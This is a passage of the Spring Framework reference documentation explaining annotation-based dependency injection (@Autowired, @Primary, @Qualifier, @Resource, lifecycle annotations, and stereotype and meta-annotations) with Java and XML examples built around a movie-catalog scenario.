setMovieFinder(MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nYou can also apply the annotation to methods with arbitrary names and\/or multiple\narguments:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\tprivate MovieCatalog movieCatalog;\n\n\t\tprivate CustomerPreferenceDao customerPreferenceDao;\n\n\t\t@Autowired\n\t\tpublic void prepare(MovieCatalog movieCatalog,\n\t\t\t\tCustomerPreferenceDao customerPreferenceDao) {\n\t\t\tthis.movieCatalog = movieCatalog;\n\t\t\tthis.customerPreferenceDao = customerPreferenceDao;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nYou can apply `@Autowired` to fields as well and even mix it with constructors:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\tprivate final CustomerPreferenceDao customerPreferenceDao;\n\n\t\t@Autowired\n\t\tprivate MovieCatalog movieCatalog;\n\n\t\t@Autowired\n\t\tpublic MovieRecommender(CustomerPreferenceDao customerPreferenceDao) {\n\t\t\tthis.customerPreferenceDao = customerPreferenceDao;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIt is also possible to provide __all__ beans of a particular type from the\n`ApplicationContext` by adding the annotation to a field or method that expects an array\nof that type:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\t@Autowired\n\t\tprivate MovieCatalog[] movieCatalogs;\n\n\t\t\/\/ ...\n\n\t}\n----\n\nThe same applies for typed collections:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\tprivate Set<MovieCatalog> movieCatalogs;\n\n\t\t@Autowired\n\t\tpublic void setMovieCatalogs(Set<MovieCatalog> movieCatalogs) {\n\t\t\tthis.movieCatalogs = movieCatalogs;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\n[TIP]\n====\nYour beans can implement the `org.springframework.core.Ordered` interface or use either\nthe `@Order` or the standard `@Priority` annotation if you want items in the array or list\nto be sorted into a specific order.\n====\n\n\nEven typed Maps can be autowired as long as the expected key type is `String`. 
The Map\nvalues will contain all beans of the expected type, and the keys will contain the\ncorresponding bean names:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\tprivate Map<String, MovieCatalog> movieCatalogs;\n\n\t\t@Autowired\n\t\tpublic void setMovieCatalogs(Map<String, MovieCatalog> movieCatalogs) {\n\t\t\tthis.movieCatalogs = movieCatalogs;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nBy default, the autowiring fails whenever __zero__ candidate beans are available; the\ndefault behavior is to treat annotated methods, constructors, and fields as\nindicating __required__ dependencies. This behavior can be changed as demonstrated below.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\n\t\t@Autowired(required=false)\n\t\tpublic void setMovieFinder(MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\n[NOTE]\n====\nOnly __one annotated constructor per class__ can be marked as __required__, but multiple\nnon-required constructors can be annotated. In that case, each is considered among the\ncandidates and Spring uses the __greediest__ constructor whose dependencies can be\nsatisfied, that is, the constructor that has the largest number of arguments.\n\n`@Autowired`'s __required__ attribute is recommended over the `@Required` annotation.\nSetting the __required__ attribute to `false` indicates that the property is not required\nfor autowiring purposes; the property is ignored if it cannot be autowired. `@Required`,\non the other hand, is stronger in that it enforces that the property be set by any means\nsupported by the container. If no value is injected, a corresponding exception is raised.\n====\n\nYou can also use `@Autowired` for interfaces that are well-known resolvable\ndependencies: `BeanFactory`, `ApplicationContext`, `Environment`, `ResourceLoader`,\n`ApplicationEventPublisher`, and `MessageSource`. These interfaces and their extended\ninterfaces, such as `ConfigurableApplicationContext` or `ResourcePatternResolver`, are\nautomatically resolved, with no special setup necessary.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\t@Autowired\n\t\tprivate ApplicationContext context;\n\n\t\tpublic MovieRecommender() {\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\n[NOTE]\n====\n`@Autowired`, `@Inject`, `@Resource`, and `@Value` annotations are handled by Spring\n`BeanPostProcessor` implementations, which in turn means that you __cannot__ apply these\nannotations within your own `BeanPostProcessor` or `BeanFactoryPostProcessor` types (if\nany). These types must be 'wired up' explicitly via XML or using a Spring `@Bean` method.\n====\n\n\n[[beans-autowired-annotation-primary]]\n=== Fine-tuning annotation-based autowiring with @Primary\n\nBecause autowiring by type may lead to multiple candidates, it is often necessary to have\nmore control over the selection process. One way to accomplish this is with Spring's\n`@Primary` annotation. `@Primary` indicates that a particular bean should be given\npreference when multiple beans are candidates to be autowired to a single-valued\ndependency. 
If exactly one 'primary' bean exists among the candidates, it will be the\nautowired value.\n\nLet's assume we have the following configuration that defines `firstMovieCatalog` as the\n_primary_ `MovieCatalog`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class MovieConfiguration {\n\n\t\t@Bean\n\t\t**@Primary**\n\t\tpublic MovieCatalog firstMovieCatalog() { ... }\n\n\t\t@Bean\n\t\tpublic MovieCatalog secondMovieCatalog() { ... }\n\n\t\t\/\/ ...\n\n\t}\n----\n\nWith such a configuration, the following `MovieRecommender` will be autowired with the\n`firstMovieCatalog`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\t@Autowired\n\t\tprivate MovieCatalog movieCatalog;\n\n\t\t\/\/ ...\n\n\t}\n----\n\n\nThe corresponding bean definitions appear as follows.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:context=\"http:\/\/www.springframework.org\/schema\/context\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\/spring-context.xsd\">\n\n\t\t<context:annotation-config\/>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\" **primary=\"true\"**>\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t\t<bean id=\"movieRecommender\" class=\"example.MovieRecommender\"\/>\n\n\t<\/beans>\n----\n\n\n[[beans-autowired-annotation-qualifiers]]\n=== Fine-tuning annotation-based autowiring with qualifiers\n\n`@Primary` is an effective way to use autowiring by type with several instances when one\nprimary candidate can be determined. When more control over the selection process is\nrequired, Spring's `@Qualifier` annotation can be used. You can associate qualifier values\nwith specific arguments, narrowing the set of type matches so that a specific bean is\nchosen for each argument. In the simplest case, this can be a plain descriptive value:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\t@Autowired\n\t\t**@Qualifier(\"main\")**\n\t\tprivate MovieCatalog movieCatalog;\n\n\t\t\/\/ ...\n\n\t}\n----\n\nThe `@Qualifier` annotation can also be specified on individual constructor arguments or\nmethod parameters:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\tprivate MovieCatalog movieCatalog;\n\n\t\tprivate CustomerPreferenceDao customerPreferenceDao;\n\n\t\t@Autowired\n\t\tpublic void prepare(**@Qualifier(\"main\")** MovieCatalog movieCatalog,\n\t\t\t\tCustomerPreferenceDao customerPreferenceDao) {\n\t\t\tthis.movieCatalog = movieCatalog;\n\t\t\tthis.customerPreferenceDao = customerPreferenceDao;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nThe corresponding bean definitions appear as follows. 
The bean with qualifier value\n\"main\" is wired with the constructor argument that is qualified with the same value.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:context=\"http:\/\/www.springframework.org\/schema\/context\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\/spring-context.xsd\">\n\n\t\t<context:annotation-config\/>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t\t**<qualifier value=\"main\"\/>**\n\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t\t**<qualifier value=\"action\"\/>**\n\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t\t<bean id=\"movieRecommender\" class=\"example.MovieRecommender\"\/>\n\n\t<\/beans>\n----\n\nFor a fallback match, the bean name is considered a default qualifier value. Thus you\ncan define the bean with an id \"main\" instead of the nested qualifier element, leading\nto the same matching result. However, although you can use this convention to refer to\nspecific beans by name, `@Autowired` is fundamentally about type-driven injection with\noptional semantic qualifiers. This means that qualifier values, even with the bean name\nfallback, always have narrowing semantics within the set of type matches; they do not\nsemantically express a reference to a unique bean id. Good qualifier values are \"main\"\nor \"EMEA\" or \"persistent\", expressing characteristics of a specific component that are\nindependent from the bean `id`, which may be auto-generated in case of an anonymous bean\ndefinition like the one in the preceding example.\n\nQualifiers also apply to typed collections, as discussed above, for example, to\n`Set<MovieCatalog>`. In this case, all matching beans according to the declared\nqualifiers are injected as a collection. This implies that qualifiers do not have to be\nunique; they rather simply constitute filtering criteria. For example, you can define\nmultiple `MovieCatalog` beans with the same qualifier value \"action\", all of which would\nbe injected into a `Set<MovieCatalog>` annotated with `@Qualifier(\"action\")`.\n\n[TIP]\n====\n\nIf you intend to express annotation-driven injection by name, do not primarily use\n`@Autowired`, even if it is technically capable of referring to a bean name through\n`@Qualifier` values. Instead, use the JSR-250 `@Resource` annotation, which is\nsemantically defined to identify a specific target component by its unique name, with\nthe declared type being irrelevant for the matching process. 
`@Autowired` has rather\ndifferent semantics: After selecting candidate beans by type, the specified String\nqualifier value will be considered within those type-selected candidates only, e.g.\nmatching an \"account\" qualifier against beans marked with the same qualifier label.\n\nFor beans that are themselves defined as a collection\/map or array type, `@Resource`\nis a fine solution, referring to the specific collection or array bean by unique name.\nThat said, as of 4.3, collection\/map and array types can be matched through Spring's\n`@Autowired` type matching algorithm as well, as long as the element type information\nis preserved in `@Bean` return type signatures or collection inheritance hierarchies.\nIn this case, qualifier values can be used to select among same-typed collections,\nas outlined in the previous paragraph.\n\nAs of 4.3, `@Autowired` also considers self references for injection, i.e. references\nback to the bean that is currently injected. Note that self injection is a fallback;\nregular dependencies on other components always have precedence. In that sense, self\nreferences do not participate in regular candidate selection and are therefore in\nparticular never primary; on the contrary, they always end up as lowest precedence.\nIn practice, use self references as a last resort only, e.g. for calling other methods\non the same instance through the bean's transactional proxy: Consider factoring out\nthe affected methods to a separate delegate bean in such a scenario. Alternatively,\nuse `@Resource` which may obtain a proxy back to the current bean by its unique name.\n\n`@Autowired` applies to fields, constructors, and multi-argument methods, allowing for\nnarrowing through qualifier annotations at the parameter level. By contrast, `@Resource`\nis supported only for fields and bean property setter methods with a single argument.\nAs a consequence, stick with qualifiers if your injection target is a constructor or a\nmulti-argument method.\n====\n\nYou can create your own custom qualifier annotations. Simply define an annotation and\nprovide the `@Qualifier` annotation within your definition:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Target({ElementType.FIELD, ElementType.PARAMETER})\n\t@Retention(RetentionPolicy.RUNTIME)\n\t**@Qualifier**\n\tpublic @interface Genre {\n\n\t\tString value();\n\t}\n----\n\nThen you can provide the custom qualifier on autowired fields and parameters:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\t@Autowired\n\t\t**@Genre(\"Action\")**\n\t\tprivate MovieCatalog actionCatalog;\n\t\tprivate MovieCatalog comedyCatalog;\n\n\t\t@Autowired\n\t\tpublic void setComedyCatalog(**@Genre(\"Comedy\")** MovieCatalog comedyCatalog) {\n\t\t\tthis.comedyCatalog = comedyCatalog;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nNext, provide the information for the candidate bean definitions. You can add\n`<qualifier\/>` tags as sub-elements of the `<bean\/>` tag and then specify the `type` and\n`value` to match your custom qualifier annotations. The type is matched against the\nfully-qualified class name of the annotation. Or, as a convenience if no risk of\nconflicting names exists, you can use the short class name. 
Both approaches are\ndemonstrated in the following example.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:context=\"http:\/\/www.springframework.org\/schema\/context\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\/spring-context.xsd\">\n\n\t\t<context:annotation-config\/>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t\t**<qualifier type=\"Genre\" value=\"Action\"\/>**\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t\t**<qualifier type=\"example.Genre\" value=\"Comedy\"\/>**\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t\t<bean id=\"movieRecommender\" class=\"example.MovieRecommender\"\/>\n\n\t<\/beans>\n----\n\nIn <<beans-classpath-scanning>>, you will see an annotation-based alternative to\nproviding the qualifier metadata in XML. Specifically, see <<beans-scanning-qualifiers>>.\n\nIn some cases, it may be sufficient to use an annotation without a value. This may be\nuseful when the annotation serves a more generic purpose and can be applied across\nseveral different types of dependencies. For example, you may provide an __offline__\ncatalog that would be searched when no Internet connection is available. First define\nthe simple annotation:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Target({ElementType.FIELD, ElementType.PARAMETER})\n\t@Retention(RetentionPolicy.RUNTIME)\n\t@Qualifier\n\tpublic @interface Offline {\n\n\t}\n----\n\nThen add the annotation to the field or property to be autowired:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\t@Autowired\n\t\t**@Offline**\n\t\tprivate MovieCatalog offlineCatalog;\n\n\t\t\/\/ ...\n\n\t}\n----\n\nNow the bean definition only needs a qualifier `type`:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t**<qualifier type=\"Offline\"\/>**\n\t\t<!-- inject any dependencies required by this bean -->\n\t<\/bean>\n----\n\nYou can also define custom qualifier annotations that accept named attributes in\naddition to or instead of the simple `value` attribute. If multiple attribute values are\nthen specified on a field or parameter to be autowired, a bean definition must match\n__all__ such attribute values to be considered an autowire candidate. 
As an example,\nconsider the following annotation definition:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Target({ElementType.FIELD, ElementType.PARAMETER})\n\t@Retention(RetentionPolicy.RUNTIME)\n\t@Qualifier\n\tpublic @interface MovieQualifier {\n\n\t\tString genre();\n\n\t\tFormat format();\n\n\t}\n----\n\nIn this case `Format` is an enum:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic enum Format {\n\t\tVHS, DVD, BLURAY\n\t}\n----\n\nThe fields to be autowired are annotated with the custom qualifier and include values\nfor both attributes: `genre` and `format`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\t@Autowired\n\t\t@MovieQualifier(format=Format.VHS, genre=\"Action\")\n\t\tprivate MovieCatalog actionVhsCatalog;\n\n\t\t@Autowired\n\t\t@MovieQualifier(format=Format.VHS, genre=\"Comedy\")\n\t\tprivate MovieCatalog comedyVhsCatalog;\n\n\t\t@Autowired\n\t\t@MovieQualifier(format=Format.DVD, genre=\"Action\")\n\t\tprivate MovieCatalog actionDvdCatalog;\n\n\t\t@Autowired\n\t\t@MovieQualifier(format=Format.BLURAY, genre=\"Comedy\")\n\t\tprivate MovieCatalog comedyBluRayCatalog;\n\n\t\t\/\/ ...\n\n\t}\n----\n\nFinally, the bean definitions should contain matching qualifier values. This example\nalso demonstrates that bean __meta__ attributes may be used instead of the\n`<qualifier\/>` sub-elements. If available, the `<qualifier\/>` and its attributes take\nprecedence, but the autowiring mechanism falls back on the values provided within the\n`<meta\/>` tags if no such qualifier is present, as in the last two bean definitions in\nthe following example.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:context=\"http:\/\/www.springframework.org\/schema\/context\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\/spring-context.xsd\">\n\n\t\t<context:annotation-config\/>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t\t<qualifier type=\"MovieQualifier\">\n\t\t\t\t<attribute key=\"format\" value=\"VHS\"\/>\n\t\t\t\t<attribute key=\"genre\" value=\"Action\"\/>\n\t\t\t<\/qualifier>\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t\t<qualifier type=\"MovieQualifier\">\n\t\t\t\t<attribute key=\"format\" value=\"VHS\"\/>\n\t\t\t\t<attribute key=\"genre\" value=\"Comedy\"\/>\n\t\t\t<\/qualifier>\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t\t<meta key=\"format\" value=\"DVD\"\/>\n\t\t\t<meta key=\"genre\" value=\"Action\"\/>\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t\t<meta key=\"format\" value=\"BLURAY\"\/>\n\t\t\t<meta key=\"genre\" value=\"Comedy\"\/>\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t<\/beans>\n----\n\n\n\n[[beans-generics-as-qualifiers]]\n=== Using generics as autowiring qualifiers\n\nIn addition to the `@Qualifier` annotation, it is also possible to use Java generic types\nas an 
implicit form of qualification. For example, suppose you have the following\nconfiguration:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class MyConfiguration {\n\n\t\t@Bean\n\t\tpublic StringStore stringStore() {\n\t\t\treturn new StringStore();\n\t\t}\n\n\t\t@Bean\n\t\tpublic IntegerStore integerStore() {\n\t\t\treturn new IntegerStore();\n\t\t}\n\n\t}\n----\n\nAssuming that beans above implement a generic interface, i.e. `Store<String>` and\n`Store<Integer>`, you can `@Autowire` the `Store` interface and the __generic__ will\nbe used as a qualifier:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Autowired\n\tprivate Store<String> s1; \/\/ <String> qualifier, injects the stringStore bean\n\n\t@Autowired\n\tprivate Store<Integer> s2; \/\/ <Integer> qualifier, injects the integerStore bean\n----\n\nGeneric qualifiers also apply when autowiring Lists, Maps and Arrays:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ Inject all Store beans as long as they have an <Integer> generic\n\t\/\/ Store<String> beans will not appear in this list\n\t@Autowired\n\tprivate List<Store<Integer>> s;\n----\n\n\n\n\n[[beans-custom-autowire-configurer]]\n=== CustomAutowireConfigurer\n\nThe\n{api-spring-framework}\/beans\/factory\/annotation\/CustomAutowireConfigurer.html[`CustomAutowireConfigurer`]\nis a `BeanFactoryPostProcessor` that enables you to register your own custom qualifier\nannotation types even if they are not annotated with Spring's `@Qualifier` annotation.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"customAutowireConfigurer\"\n\t\t\tclass=\"org.springframework.beans.factory.annotation.CustomAutowireConfigurer\">\n\t\t<property name=\"customQualifierTypes\">\n\t\t\t<set>\n\t\t\t\t<value>example.CustomQualifier<\/value>\n\t\t\t<\/set>\n\t\t<\/property>\n\t<\/bean>\n----\n\nThe `AutowireCandidateResolver` determines autowire candidates by:\n\n* the `autowire-candidate` value of each bean definition\n* any `default-autowire-candidates` pattern(s) available on the `<beans\/>` element\n* the presence of `@Qualifier` annotations and any custom annotations registered\nwith the `CustomAutowireConfigurer`\n\nWhen multiple beans qualify as autowire candidates, the determination of a \"primary\" is\nthe following: if exactly one bean definition among the candidates has a `primary`\nattribute set to `true`, it will be selected.\n\n\n\n[[beans-resource-annotation]]\n=== @Resource\n\nSpring also supports injection using the JSR-250 `@Resource` annotation on fields or\nbean property setter methods. This is a common pattern in Java EE 5 and 6, for example\nin JSF 1.2 managed beans or JAX-WS 2.0 endpoints. Spring supports this pattern for\nSpring-managed objects as well.\n\n`@Resource` takes a name attribute, and by default Spring interprets that value as the\nbean name to be injected. In other words, it follows __by-name__ semantics, as\ndemonstrated in this example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\n\t\t**@Resource(name=\"myMovieFinder\")**\n\t\tpublic void setMovieFinder(MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t}\n----\n\nIf no name is specified explicitly, the default name is derived from the field name or\nsetter method. In case of a field, it takes the field name; in case of a setter method,\nit takes the bean property name. 
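\n\nFor instance, the following hedged sketch relies on the field name alone, so a bean\nnamed \"movieFinder\" would be looked up:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class SimpleMovieLister {\n\n\t\t\/\/ no explicit name given: the field name \"movieFinder\"\n\t\t\/\/ is used as the name of the bean to inject\n\t\t**@Resource**\n\t\tprivate MovieFinder movieFinder;\n\n\t}\n----\n\n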
So the following example is going to have the bean with\nname \"movieFinder\" injected into its setter method:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\n\t\t**@Resource**\n\t\tpublic void setMovieFinder(MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t}\n----\n\n[NOTE]\n====\nThe name provided with the annotation is resolved as a bean name by the\n`ApplicationContext` of which the `CommonAnnotationBeanPostProcessor` is aware. The\nnames can be resolved through JNDI if you configure Spring's\n{api-spring-framework}\/jndi\/support\/SimpleJndiBeanFactory.html[`SimpleJndiBeanFactory`]\nexplicitly. However, it is recommended that you rely on the default behavior and simply\nuse Spring's JNDI lookup capabilities to preserve the level of indirection.\n====\n\nIn the exclusive case of `@Resource` usage with no explicit name specified, and similar\nto `@Autowired`, `@Resource` finds a primary type match instead of a specific named bean\nand resolves well-known resolvable dependencies: the `BeanFactory`,\n`ApplicationContext`, `ResourceLoader`, `ApplicationEventPublisher`, and `MessageSource`\ninterfaces.\n\nThus in the following example, the `customerPreferenceDao` field first looks for a bean\nnamed customerPreferenceDao, then falls back to a primary type match for the type\n`CustomerPreferenceDao`. The \"context\" field is injected based on the known resolvable\ndependency type `ApplicationContext`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\t@Resource\n\t\tprivate CustomerPreferenceDao customerPreferenceDao;\n\n\t\t@Resource\n\t\tprivate ApplicationContext context;\n\n\t\tpublic MovieRecommender() {\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\n\n\n[[beans-postconstruct-and-predestroy-annotations]]\n=== @PostConstruct and @PreDestroy\n\nThe `CommonAnnotationBeanPostProcessor` not only recognizes the `@Resource` annotation\nbut also the JSR-250 __lifecycle__ annotations. Introduced in Spring 2.5, the support\nfor these annotations offers yet another alternative to those described in\n<<beans-factory-lifecycle-initializingbean,initialization callbacks>> and\n<<beans-factory-lifecycle-disposablebean,destruction callbacks>>. Provided that the\n`CommonAnnotationBeanPostProcessor` is registered within the Spring\n`ApplicationContext`, a method carrying one of these annotations is invoked at the same\npoint in the lifecycle as the corresponding Spring lifecycle interface method or\nexplicitly declared callback method. In the example below, the cache will be\npre-populated upon initialization and cleared upon destruction.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class CachingMovieLister {\n\n\t\t@PostConstruct\n\t\tpublic void populateMovieCache() {\n\t\t\t\/\/ populates the movie cache upon initialization...\n\t\t}\n\n\t\t@PreDestroy\n\t\tpublic void clearMovieCache() {\n\t\t\t\/\/ clears the movie cache upon destruction...\n\t\t}\n\n\t}\n----\n\n[NOTE]\n====\nFor details about the effects of combining various lifecycle mechanisms, see\n<<beans-factory-lifecycle-combined-effects>>.\n====\n\n\n\n\n[[beans-classpath-scanning]]\n== Classpath scanning and managed components\nMost examples in this chapter use XML to specify the configuration metadata that produces\neach `BeanDefinition` within the Spring container. 
The previous section\n(<<beans-annotation-config>>) demonstrates how to provide a lot of the configuration\nmetadata through source-level annotations. Even in those examples, however, the \"base\"\nbean definitions are explicitly defined in the XML file, while the annotations only drive\nthe dependency injection. This section describes an option for implicitly detecting the\n__candidate components__ by scanning the classpath. Candidate components are classes that\nmatch against a filter criteria and have a corresponding bean definition registered with\nthe container. This removes the need to use XML to perform bean registration; instead you\ncan use annotations (for example `@Component`), AspectJ type expressions, or your own\ncustom filter criteria to select which classes will have bean definitions registered with\nthe container.\n\n[NOTE]\n====\nStarting with Spring 3.0, many features provided by the Spring JavaConfig project are\npart of the core Spring Framework. This allows you to define beans using Java rather\nthan using the traditional XML files. Take a look at the `@Configuration`, `@Bean`,\n`@Import`, and `@DependsOn` annotations for examples of how to use these new features.\n====\n\n\n\n[[beans-stereotype-annotations]]\n=== @Component and further stereotype annotations\n\nThe `@Repository` annotation is a marker for any class that fulfills the role or\n__stereotype__ of a repository (also known as Data Access Object or DAO). Among the uses\nof this marker is the automatic translation of exceptions as described in\n<<orm-exception-translation>>.\n\nSpring provides further stereotype annotations: `@Component`, `@Service`, and\n`@Controller`. `@Component` is a generic stereotype for any Spring-managed component.\n`@Repository`, `@Service`, and `@Controller` are specializations of `@Component` for\nmore specific use cases, for example, in the persistence, service, and presentation\nlayers, respectively. Therefore, you can annotate your component classes with\n`@Component`, but by annotating them with `@Repository`, `@Service`, or `@Controller`\ninstead, your classes are more properly suited for processing by tools or associating\nwith aspects. For example, these stereotype annotations make ideal targets for\npointcuts. It is also possible that `@Repository`, `@Service`, and `@Controller` may\ncarry additional semantics in future releases of the Spring Framework. Thus, if you are\nchoosing between using `@Component` or `@Service` for your service layer, `@Service` is\nclearly the better choice. Similarly, as stated above, `@Repository` is already\nsupported as a marker for automatic exception translation in your persistence layer.\n\n\n\n[[beans-meta-annotations]]\n=== Meta-annotations\n\nMany of the annotations provided by Spring can be used as __meta-annotations__ in your\nown code. A meta-annotation is simply an annotation that can be applied to another\nannotation. For example, the `@Service` annotation mentioned above is meta-annotated with\n`@Component`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Target(ElementType.TYPE)\n\t@Retention(RetentionPolicy.RUNTIME)\n\t@Documented\n\t**@Component** \/\/ Spring will see this and treat @Service in the same way as @Component\n\tpublic @interface Service {\n\n\t\t\/\/ ....\n\t}\n----\n\nMeta-annotations can also be combined to create __composed annotations__. 
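\n\nAs a hedged sketch, a composed annotation of your own might combine a stereotype with\nanother Spring annotation (the `@TransactionalService` name is purely illustrative):\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Target(ElementType.TYPE)\n\t@Retention(RetentionPolicy.RUNTIME)\n\t@Documented\n\t@Service \/\/ detected by component scanning like any @Service\n\t@Transactional \/\/ transactional semantics applied as a meta-annotation\n\tpublic @interface TransactionalService {\n\t}\n----\n\nSpring itself ships such composed annotations as well. 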
